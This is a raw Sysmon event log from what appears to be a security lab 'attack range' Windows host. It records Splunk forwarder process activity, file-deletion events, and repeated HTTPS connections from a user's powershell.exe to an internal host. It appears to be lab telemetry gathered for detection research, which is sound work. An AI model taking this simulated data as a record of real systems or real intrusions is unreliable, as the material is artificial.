10341000x800000000000000035083737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.607{B81B27B7-4D34-613A-1E90-03000000C801}15842408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.345{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=774E5A0AC53132259D52E3A2AEAAC8FE,SHA256=C67AB6D2C79FC010C72F09638E7C19F0CAFF2452AD606C348D1FD74D640AAFB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:45.943{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB551ED9F255E8E15BADDD7F10F97888,SHA256=4BD7151D25D337EAE72D73928876E2D09C7304C427E0749CCA73EC2F90C1CD10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:45.160{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A959E5BDF2BB6BFB1A167ED6282114E,SHA256=8D390F2C2ED7E70D3EF91B04C8128B0CA68895B5B057B43F4C1A43E506299D1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:46.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFB351BCD400B24A32855E7B7D5614A2,SHA256=DBA06C59A8548FB035A6563961F9063003746F526D2A2BEE6BDB520BCDE83FB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:46.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B211FBA11EA7328AFF963FF1C38163,SHA256=D21AF0F51443D089D7AA3CC26A2E8C3F008A43D49B0C4934351F01C186CB4CD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:12.071{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56511-false10.0.1.12-8000- 354300x800000000000000035083753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:11.304{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56510-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:47.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BD6EE5041827B7B8D6043B57AA266D,SHA256=E09A9C2AEB643C23FE89A0DF6864C4DBC80D14EE43D75D7887FF3A5209CC33AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:48.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B60E4304DCC0D5C2C504FA4E4A0D0BE,SHA256=7566513E4DDA48DCCEC7999186BF2E2B9D64CA4D820C8E941BEDE638784AC60A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:49.240{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B839DA75BDBD1BE4B424D9C2603A9C,SHA256=E3DA3933AF2CDF19CFC247B8855F5D3637F5DE89E130CB5BBC5F7C05A0AC849D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:50.322{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1326C91D00BC24DCDD750E2153E34F63,SHA256=2799D02D9B990A36C344378AD520DED67AF27D7FE23EF58290C99DB9FED6730E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:50.270{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66634ECF1117E507F29404FC37828D44,SHA256=A9B5FC4F77CE70BABE57F3F9E5A6847C74674E29CE4F2C8ABF6E0E14F02F79AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:15.315{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56512-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:51.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10EB62F8772A5C9FE053C8FEA77A38B1,SHA256=63FA8425F09975FF1DFC4D57577F5A2D0C3067984726F76C11BE36BF54711759,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:52.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92C01A0E05B2C027B03D03988877360,SHA256=ABBADD382596F6BE5959372813AA9C6371419307595FC786F4C79D6AA9343079,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:18.048{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56513-false10.0.1.12-8000- 23542300x800000000000000035083762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:53.335{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2BC728B7AD22BCE53248AD40BE88247,SHA256=B66540B14E1F20330B4FC9906714B8805FF7C764729374C230BB95F8D32D15E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:54.749{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:54.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0363F2DD9FCF24909D5037F091F256A8,SHA256=0CFB0DF3E6172C3A3AC0E643F9CA324A9DFF30CB6212324FD25EC07261816A94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:55.532{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E938FBDC995FD0674BFB87F3F170B325,SHA256=A356B67F9CD70AA02141DFBA5EE3684DC8CF2559492B4B04A7DC29B86EAA5E1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:20.325{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56514-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:55.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A707860F37A2A2E6061B328D7A2015E4,SHA256=5F267C31250B4E39348A014BC9CE38C37898AEA379D10E35F31793B7BA6FA29D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:20.745{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56515-false10.0.1.12-8089- 23542300x800000000000000035083769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:56.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DDB9115879A0F10476F6344C5465D93,SHA256=65755C45807B191544912DBC12CB8CE5B8A8CDAD4C434B0001AF7D235DCD97D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:57.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B99E552A74CD65A7C3D0667EFAAD9456,SHA256=ACFCF1E7D32F4604D0B57E57A279E9D8B640050A60051565B1A9B07FBB24AF16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:58.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=834F5F6486565AC505248384C7EE2FB3,SHA256=F3C45D0B28C325AC172C99A3B30C55BB8027D4D3153EE8345CD713DCE9FEBA9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:24.342{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56517-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:23.121{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56516-false10.0.1.12-8000- 23542300x800000000000000035083774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:59.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DEC2794D47D312A3D106A3A78217AA5,SHA256=258EE595906F2D1AADA84F3937B6E7CDE6DC5B1524D9625B017F8D12341F03BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:59.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3EE3B7AC38EA63B7103FA08155D8F454,SHA256=209D2A3F0CD6826569A9FEA93CEDFF85D2189CFEB2DA0D20BFC3A7DC5598EDD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:00.491{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C550B4BF1FC4423C63672A014A7808C,SHA256=FA1E79EFE0BC77876C89EC18F3BC9C99D9568F9A460231AAC78EC109A3DD94FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:01.558{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE1C6FBCD66711538C75379E4F42AD0E,SHA256=0729959D9298462091393D478FD44FB2B962CF293FF6B71BDF82D3DB13DED4DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:02.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73E3AD44E3D52831A03DB406E220110,SHA256=D0C7B350CEB3C2D515E0E295F6E2F592F95E2260E5D9369F7BD39E7D9417FCE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:03.641{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C08D7E38DD086630D5A0F5BBB3777C0,SHA256=3EA33E0D0FEED7DD31885D67383A05ED6CC27FB0069ACE4EA6115EC01A521806,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035083780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:07:03.126{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5a5-0x7de8036a) 354300x800000000000000035083786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.354{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56519-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:29.068{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse168.61.215.74-123ntp 354300x800000000000000035083784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:28.170{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56518-false10.0.1.12-8000- 